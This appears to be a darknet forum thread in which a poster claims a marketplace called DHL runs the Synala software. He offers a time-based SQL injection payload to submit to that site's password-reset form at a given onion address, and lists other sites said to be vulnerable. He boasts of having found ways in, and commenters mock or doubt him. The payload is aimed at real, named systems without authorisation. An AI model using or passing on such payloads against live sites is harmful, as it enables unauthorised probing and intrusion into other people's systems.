DHL uses Synala :) (With proof)

https://github.com/peterscott78/synala

So you can detect Synala quite easily

Put

=' AND (SELECT * FROM (SELECT(SLEEP(5)))hXbN)-- 

in

http://darkheroesq46awl.onion/reset_password2

Submit the form and viola, you can determine the project they are using.

These quality (shitty) sites uses it:

https://darklaunder.com/blog"

https://bitplastic.com/%C2%A0

But I'm sure this project is completely secure and we haven't used the source code to find ways in :)


Comments


[3 Points] btcquestionn:

lolol no one cares. Your current spamming of the forums and user inbox's is just making it seem like you lack the ability to be anything more than a slight nuisance. Please do us all a favor and DIAF at your earliest convenience.


[2 Points] None:

[deleted]


[1 Points] The_Grid_Is_Up:

Oh jeez lol.


[1 Points] honestlyimeanreally:

If you found ways in, why would you be bragging about a simple discovery exploit?

This post would risk your attack vector's safety.

And this is why I think you're lying about your "ways in"

Neat trick though. Anyone verify it? I'm on mobile


[1 Points] qsift2:

teach me how to hack darpa servers


[1 Points] None:

[deleted]


[1 Points] ShulginsCat:

I actually like the look of DHL - they seem like cool people. Oh well... upvote4popcorn